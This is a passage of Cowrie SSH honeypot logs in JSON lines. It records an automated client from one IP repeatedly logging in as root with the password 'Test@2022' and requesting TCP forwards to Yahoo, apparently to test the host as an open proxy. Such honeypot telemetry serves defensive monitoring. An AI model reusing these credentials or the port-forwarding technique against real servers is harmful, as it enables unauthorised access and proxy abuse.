tr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.415384Z","src_ip":"213.209.150.239","session":"267b8e81a4df"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.650334Z","src_ip":"213.209.150.239","session":"267b8e81a4df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":30069,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:30069","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.698908Z","session":"267b8e81a4df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.746343Z","src_ip":"213.209.150.239","session":"267b8e81a4df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":18674,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:18674","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.881543Z","session":"267b8e81a4df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.928769Z","src_ip":"213.209.150.239","session":"267b8e81a4df"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:54.976620Z","src_ip":"213.209.150.239","session":"267b8e81a4df"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6474,"dst_ip":"1.2.3.4","dst_port":22,"session":"88e9ffd3bede","protocol":"ssh","message":"New connection: 213.209.150.239:6474 (1.2.3.4:22) [session: 88e9ffd3bede]","sensor":"my-vps","timestamp":"2025-08-26T00:59:55.032350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:55.033360Z","src_ip":"213.209.150.239","session":"88e9ffd3bede"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:55.090132Z","src_ip":"213.209.150.239","session":"88e9ffd3bede"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:55.372897Z","src_ip":"213.209.150.239","session":"88e9ffd3bede"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":5605,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:5605","sensor":"my-vps","timestamp":"2025-08-26T00:59:55.430592Z","session":"88e9ffd3bede"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:55.487453Z","src_ip":"213.209.150.239","session":"88e9ffd3bede"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":22775,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:22775","sensor":"my-vps","timestamp":"2025-08-26T00:59:55.643179Z","session":"88e9ffd3bede"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:55.699852Z","src_ip":"213.209.150.239","session":"88e9ffd3bede"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:55.757287Z","src_ip":"213.209.150.239","session":"88e9ffd3bede"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6536,"dst_ip":"1.2.3.4","dst_port":22,"session":"876c46a8892e","protocol":"ssh","message":"New connection: 213.209.150.239:6536 (1.2.3.4:22) [session: 876c46a8892e]","sensor":"my-vps","timestamp":"2025-08-26T00:59:55.803477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:55.813549Z","src_ip":"213.209.150.239","session":"876c46a8892e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:55.850793Z","src_ip":"213.209.150.239","session":"876c46a8892e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:56.086006Z","src_ip":"213.209.150.239","session":"876c46a8892e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":8135,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8135","sensor":"my-vps","timestamp":"2025-08-26T00:59:56.134787Z","session":"876c46a8892e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:56.182103Z","src_ip":"213.209.150.239","session":"876c46a8892e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":3658,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:3658","sensor":"my-vps","timestamp":"2025-08-26T00:59:56.325676Z","session":"876c46a8892e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:56.373155Z","src_ip":"213.209.150.239","session":"876c46a8892e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:56.421492Z","src_ip":"213.209.150.239","session":"876c46a8892e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6576,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c0384ef316d","protocol":"ssh","message":"New connection: 213.209.150.239:6576 (1.2.3.4:22) [session: 1c0384ef316d]","sensor":"my-vps","timestamp":"2025-08-26T00:59:56.477142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:56.478006Z","src_ip":"213.209.150.239","session":"1c0384ef316d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:56.534511Z","src_ip":"213.209.150.239","session":"1c0384ef316d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:56.816496Z","src_ip":"213.209.150.239","session":"1c0384ef316d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":31747,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:31747","sensor":"my-vps","timestamp":"2025-08-26T00:59:56.873757Z","session":"1c0384ef316d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:56.930381Z","src_ip":"213.209.150.239","session":"1c0384ef316d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":20526,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:20526","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.087450Z","session":"1c0384ef316d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.144202Z","src_ip":"213.209.150.239","session":"1c0384ef316d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.202065Z","src_ip":"213.209.150.239","session":"1c0384ef316d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6626,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9fc4e62bffe","protocol":"ssh","message":"New connection: 213.209.150.239:6626 (1.2.3.4:22) [session: a9fc4e62bffe]","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.248345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.249373Z","src_ip":"213.209.150.239","session":"a9fc4e62bffe"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.296781Z","src_ip":"213.209.150.239","session":"a9fc4e62bffe"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.531796Z","src_ip":"213.209.150.239","session":"a9fc4e62bffe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":15381,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:15381","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.580151Z","session":"a9fc4e62bffe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.627486Z","src_ip":"213.209.150.239","session":"a9fc4e62bffe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":11550,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11550","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.765648Z","session":"a9fc4e62bffe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.812958Z","src_ip":"213.209.150.239","session":"a9fc4e62bffe"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.861430Z","src_ip":"213.209.150.239","session":"a9fc4e62bffe"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6671,"dst_ip":"1.2.3.4","dst_port":22,"session":"e57bdfc20506","protocol":"ssh","message":"New connection: 213.209.150.239:6671 (1.2.3.4:22) [session: e57bdfc20506]","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.907548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.908412Z","src_ip":"213.209.150.239","session":"e57bdfc20506"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:57.955662Z","src_ip":"213.209.150.239","session":"e57bdfc20506"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:58.190537Z","src_ip":"213.209.150.239","session":"e57bdfc20506"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":23648,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:23648","sensor":"my-vps","timestamp":"2025-08-26T00:59:58.238622Z","session":"e57bdfc20506"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:58.285836Z","src_ip":"213.209.150.239","session":"e57bdfc20506"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":20411,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20411","sensor":"my-vps","timestamp":"2025-08-26T00:59:58.421539Z","session":"e57bdfc20506"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:58.468706Z","src_ip":"213.209.150.239","session":"e57bdfc20506"}
